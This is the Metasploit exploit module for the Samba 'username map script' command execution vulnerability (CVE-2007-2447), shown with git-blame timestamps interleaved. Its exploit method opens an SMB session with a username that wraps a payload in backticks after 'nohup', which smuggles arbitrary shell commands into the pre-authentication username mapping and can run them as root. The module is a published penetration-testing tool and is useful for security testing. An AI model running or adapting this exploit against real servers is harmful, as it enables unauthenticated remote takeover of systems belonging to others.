2010-02-16 00:26:41 +00:00
|
|
|
##
|
2017-07-24 06:26:21 -07:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 13:50:46 -05:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2010-02-16 00:26:41 +00:00
|
|
|
##
|
|
|
|
|
|
2016-03-08 14:02:44 +01:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2013-08-30 16:28:54 -05:00
|
|
|
Rank = ExcellentRanking
|
2010-02-16 00:26:41 +00:00
|
|
|
|
2015-02-13 17:17:59 -06:00
|
|
|
include Msf::Exploit::Remote::SMB::Client
|
2010-02-16 00:26:41 +00:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
# For our customized version of session_setup_no_ntlmssp
|
|
|
|
|
CONST = Rex::Proto::SMB::Constants
|
|
|
|
|
CRYPT = Rex::Proto::SMB::Crypt
|
2010-07-21 23:40:34 +00:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
def initialize(info = {})
|
|
|
|
|
super(update_info(info,
|
|
|
|
|
'Name' => 'Samba "username map script" Command Execution',
|
|
|
|
|
'Description' => %q{
|
2017-07-14 08:46:59 +01:00
|
|
|
This module exploits a command execution vulnerability in Samba
|
2013-08-30 16:28:54 -05:00
|
|
|
versions 3.0.20 through 3.0.25rc3 when using the non-default
|
|
|
|
|
"username map script" configuration option. By specifying a username
|
|
|
|
|
containing shell meta characters, attackers can execute arbitrary
|
|
|
|
|
commands.
|
2010-02-16 00:26:41 +00:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
No authentication is needed to exploit this vulnerability since
|
|
|
|
|
this option is used to map usernames prior to authentication!
|
|
|
|
|
},
|
|
|
|
|
'Author' => [ 'jduck' ],
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
|
|
|
|
[ 'CVE', '2007-2447' ],
|
2016-07-15 12:00:31 -05:00
|
|
|
[ 'OSVDB', '34700' ],
|
2013-08-30 16:28:54 -05:00
|
|
|
[ 'BID', '23972' ],
|
|
|
|
|
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
|
|
|
|
|
[ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
|
|
|
|
|
],
|
|
|
|
|
'Platform' => ['unix'],
|
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
|
'Privileged' => true, # root or nobody user
|
|
|
|
|
'Payload' =>
|
|
|
|
|
{
|
|
|
|
|
'Space' => 1024,
|
|
|
|
|
'DisableNops' => true,
|
|
|
|
|
'Compat' =>
|
|
|
|
|
{
|
|
|
|
|
'PayloadType' => 'cmd',
|
|
|
|
|
# *_perl and *_ruby work if they are installed
|
|
|
|
|
# mileage may vary from system to system..
|
|
|
|
|
}
|
|
|
|
|
},
|
|
|
|
|
'Targets' =>
|
|
|
|
|
[
|
|
|
|
|
[ "Automatic", { } ]
|
|
|
|
|
],
|
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
|
'DisclosureDate' => 'May 14 2007'))
|
2010-02-16 00:26:41 +00:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
Opt::RPORT(139)
|
2017-05-03 15:42:21 -05:00
|
|
|
])
|
2013-08-30 16:28:54 -05:00
|
|
|
end
|
2010-02-16 00:26:41 +00:00
|
|
|
|
2010-07-21 23:40:34 +00:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
def exploit
|
2010-02-16 00:26:41 +00:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
connect
|
2010-02-16 00:26:41 +00:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
# lol?
|
|
|
|
|
username = "/=`nohup " + payload.encoded + "`"
|
|
|
|
|
begin
|
|
|
|
|
simple.client.negotiate(false)
|
|
|
|
|
simple.client.session_setup_no_ntlmssp(username, rand_text(16), datastore['SMBDomain'], false)
|
|
|
|
|
rescue ::Timeout::Error, XCEPT::LoginError
|
|
|
|
|
# nothing, it either worked or it didn't ;)
|
|
|
|
|
end
|
2010-02-16 00:26:41 +00:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
handler
|
|
|
|
|
end
|
2010-02-16 00:26:41 +00:00
|
|
|
end
|